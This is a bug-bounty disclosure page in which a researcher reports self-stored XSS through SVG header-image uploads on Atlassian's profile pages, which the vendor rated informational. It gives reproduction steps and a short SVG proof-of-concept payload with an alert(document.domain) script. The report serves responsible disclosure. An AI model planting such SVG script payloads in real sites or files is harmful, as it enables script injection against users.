Xss Vulnerability of upload svg files in a collection section that triggers xss

Disclosed by
MR_ZHEEV
  • Engagement Atlassian
  • Disclosed date about 5 years ago
  • Priority P5 Bugcrowd's VRT priority rating
  • Status Informational This vulnerability is seen as an accepted business risk
Summary by Atlassian

Xss Vulnerability of upload svg files in start.atlassian.com

Summary by MR_ZHEEV

Don't my findings fall into the P4 category? I have reported websites with loopholes like this on several platforms for example: (H1) this is a rather serious problem, and I find that on the account section it has a rather serious impact because it is exploited via SVG files, I have come across and reported more than once the website that I get is like this and usually gets P3 & P4

Report details

  • Submitted

  • Target Location

    Atlassian Identity (https://id.atlassian.com/login)

  • Target category

    Web App

  • VRT

    Cross-Site Scripting (XSS) > Stored > Self

  • Priority

    P5
  • Bug URL
    https://id.atlassian.com/manage-profile/profile-and-visibility
  • Description

    hi team.
    I found an XSS vulnerability of upload svg files in a collection section that triggers xss

    1. Go to start.atlassian.com
    2. then select manage profile
    3. then select update your header image
    4. then add the image to the image collection with the XSS svg file

    5. Right click and see the XSS image via the svg file is executed

      Payload save format svg:

    <?xml version="1.0" standalone="no"?>
    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd%22%3E
    <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
    <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
    <script type="text/javascript">
    alert(document.domain);
    </script>
    </svg>

    Impact
    allowing uploads in the svg format creates an xss vulnerability

Activity